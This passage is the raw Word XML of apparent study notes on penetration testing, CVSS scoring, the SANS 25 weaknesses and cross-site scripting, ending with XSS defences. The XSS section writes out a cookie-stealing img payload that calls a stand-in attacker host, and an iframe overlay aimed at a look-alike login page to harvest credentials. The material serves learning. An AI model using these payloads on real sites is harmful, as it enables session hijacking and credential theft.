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6EBC" w14:textId="74206450" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Definitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF509D0" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zero Day Attack: Attacks which have no current fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F861701" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pen Tester/Ethical Hacker: Employees who simulate attacks on a system to help improve security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D3BCF" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vulnerability Assessment: An automated scanning product which probes the port and services on IP addresses. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76754797" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cross-site Scripting(XSS): When an application accepts untrustworthy data and sends it to a browser without validation or escaping, allowing attackers to execute script in the victims browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FB4BB" w14:textId="05581A3F" w:rsidR="00543599" w:rsidRDefault="00241AA9" w:rsidP="008C74C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SQL Injection: </w:t>
      </w:r>
      <w:r w:rsidR="003F62B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>An attack will send an SQL query via an input which in turn does something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA2896" w14:textId="0F3D78F3" w:rsidR="005376C0" w:rsidRDefault="005376C0" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Broken Authentication and Session Manage: A vulnerability which allows an attacker to capture credentials or get around authentication methods which restrict unauthorised access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F39A700" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:r>
        <w:t>Pen Test Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8928E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 xml:space="preserve">Set ground rules </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB061D" w14:textId="339B39D8" w:rsidR="008C74CC" w:rsidRDefault="00543599" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="008C74CC">
        <w:t>tart/end and blackout dates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1646AD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>Approvals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A220E9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>Identify and alert parties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD537C0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 xml:space="preserve">Set expectations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C8A7EE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Passive Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF0D82" w14:textId="4D0BB918" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get info about target</w:t>
      </w:r>
      <w:r w:rsidR="00543599">
        <w:t xml:space="preserve"> using Open Source Intelligence (OSINT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031608F9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Active  Scanning and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62FCA3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>Figure out targets public exposure via tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138304A9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Fingerprinting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24569326" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify OS type and patch, Application and patch level, open ports account and running services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857E4C9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Select Target System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0AD8A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 xml:space="preserve">Exploit uncovered vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E5BA8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Exploit Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4EEB50" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F470938" w14:textId="20B702C5" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:r>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5758272B" w14:textId="302B157D" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Zed Attack Proxy(ZAP): </w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:t>A free tool for automated and manual testing of web application vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73777F3F" w14:textId="52A321E5" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CVSS(Common Vulnerability Scoring System): Assess security vulnerabilities by assigning scores to vulnerabilities which are calculated using a formula dependant on several metrics (scores range from 0 to 10) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A599909" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Base score compromised of: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50BF91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Attack Vector(AV): Where vulnerability exploitation is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D1FA96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As one moves from physical to network: score increases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30872F53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Compromised of :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F4D08" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Network: Vulnerable component bound to network stack and their path is via OSI layer 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB097E" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Adjacent: Limited to shared physical network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97FB97" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Local: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A14D21">
        <w:t>Not bound to the network stack. Either the attacker has logged in locally or needs user interaction to execute the exp</w:t>
      </w:r>
      <w:r>
        <w:t>loit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279BC160" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Physical: Attacker needs to physically manipulate vulnerable component   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D563A8C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Attack Complexity(AC): Conditions beyond attacks control which must exist to exploit vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1010C8F5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 xml:space="preserve">Either Low or High metrics. This means there is either no conditions/special conditions or is extremely dependant on them, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA060A" w14:textId="42D9C1D5" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privileges Required (PR)</w:t>
      </w:r>
      <w:r w:rsidR="005376C0">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Level of privileges an attacker </w:t>
      </w:r>
      <w:r w:rsidR="005376C0">
        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Score increase with fewer privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C69FD4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Can be either Low, High or None values. This means for exploit to be successful, needs either no, basic or high level of access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EE3499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UI: Does an attack need another use to interact with something to exploit vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64AE58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None or Required Interaction for exploits success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20813ADD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Scope (S): Does the vulnerability impact resources beyond means and privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC0269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Unchanged or Change scope means that the exploit effects either the confines of system or beyond it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB52C9D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Confidentiality (C): If information is disclosed to an unauthorised user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D8542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 xml:space="preserve"> None, High or Low. Indicates how much info is leaked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E297E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Integrity (I): If veracity/trustworthiness of info maintained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A8B8F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t>None, High or Low values. These indicate how much integrity is lost and how serious of an impact it is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808BD0D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Availability (A): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224955DF" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Can a component be taken down, even partially, by exploit. Can either be totally taken offline(High) or just have reduced performance(Low)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FFDB0" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A14D21">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D64332F" wp14:editId="180C81CC">
            <wp:extent cx="5039428" cy="1914792"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="14449198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1986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376F" w14:textId="648BD9AC" w:rsidR="00237FBB" w:rsidRDefault="00237FBB" w:rsidP="00237FBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OWASP (Open Web Application Security Project) is an online community which creates articles, methodologies, tools and documents for the web application security sector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B5060C" w14:textId="12CBF769" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SysAsmin, Audit, Network &amp; Security(SANS): Private US company which specialises in training for info security and cyber security </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5CDC2" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SANS 25(List of common dangerous errors):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A34551" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Insecure interaction between components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA73D52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SQL Injection: Improper neutralisation of Special Elements used in SQL commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8473B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OS Command injection: Improper neutralisation od special elements in OS command line  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26019779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 xml:space="preserve">Cross Site scripting: Improper Neutralisation of input during web page generation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261CCC4F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Unrestricted Upload of file with a dangerous type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6B3E3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Cross site request forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBFE659" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>URL redirections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4F132" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Resource Management Risks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5F797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Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068808F7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Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCCAC8C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Download of Code Without Integrity Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66042EE7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Inclusion of Functionality from Untrusted Control Sphere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49884F06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Use of Potentially Dangerous Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4C83BB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Incorrect Calculation of Buffer Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B665BA6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Uncontrolled Format String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6CA6B" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Integer Overflow or Wraparound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B203FEA" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Porous Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F40D410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Missing Authentication for Critical Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551464C5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Missing Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6AB62E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of Hard-coded Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBC9AB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Missing Encryption of Sensitive Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD47F7D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Reliance on Untrusted Inputs in a Security Decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B9423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Execution with Unnecessary Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DEBF41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Incorrect Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C17D3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Incorrect Permission Assignment for Critical Resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410AD31E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of a Broken or Risky Cryptographic Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751FB17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Improper Restriction of Excessive Authentication Attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A8F59" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00E0422F" w:rsidRDefault="00543599" w:rsidP="00543599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of a One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-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0422F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Way Hash without a Salt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA3C0C" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CWE (Common Weakness Enumeration: Developed list of common software security weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DE75CB" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Common Vulnerability and Exposures (CVE): Dictionary of known info security vulnerabilities and exposure. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D442247" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE2E84C" w14:textId="7F5C3B44" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:r>
        <w:t>Cross Site Scripting(XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0FF66E" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How XSS works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316DB90C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Attacker can craft malicious URL(URL with malicious text) and send it to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960C817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Victim tricked into requesting URL from website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9062D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Website includes the malicious string in response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369ED4CC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Malicious scripts are executed from response and sends cookie to attackers server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4E0F3" w14:textId="6B584012" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2A27">
        <w:t>XSS makes use of improper treatment of dynamic content from a backend data store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656780B" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stores/Persistent XSS: If a page is vulnerable to this, will execute injected script every time page is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4800FB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If one inspects source code, can see where data has gone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A85DB" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE1940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Attacker Sends crafted payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB54F0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Victim logs in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE646DE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Victim visits list of pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3977A8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 xml:space="preserve">The server then responds with the attackers JavaScript </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB04D0A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Pop-up is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A198BF" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Victims browser then sends session cookies to attacker who then hijacks the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F720F02" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examples: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED07DA" w14:textId="0C05A405" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A32A69">
        <w:t>&lt;img src ='</w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:t>http://attackersite.com/index.php?cookie=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve"> '+document.cookie &gt; allows one to steal a sessions cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF216F0" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00A32A69" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A32A69">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;iframe style=' position:fixed; top:0px; left:0px bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;'' src='http://faceboook.com/login.php' &gt;&lt;/iframe&gt; allows us to harvest credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F3CF3" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00A32A69" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064751D5" w14:textId="2261364C" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS Score: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A32A69">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066CC473" wp14:editId="7AACC4BB">
            <wp:extent cx="4707670" cy="2684780"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1077155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559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378" cy="26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67A1" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To protect from XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A1566A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Escape Dynamic Content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Properly encode data before rendering it in a browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D12EC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Whitelist Inputs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Restrict allowed values (e.g., dropdown lists).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BCF96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Content Security Policy (CSP)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Specify allowed sources for scripts, preventing unauthorized execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64677DE3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Sanitize HTML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Use libraries to clean inputs of malicious scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715569D8" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00543599" w:rsidRDefault="00543599" w:rsidP="00543599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43599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HTTP-only Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>: Prevent JavaScript from accessing sensitive cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA7163" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
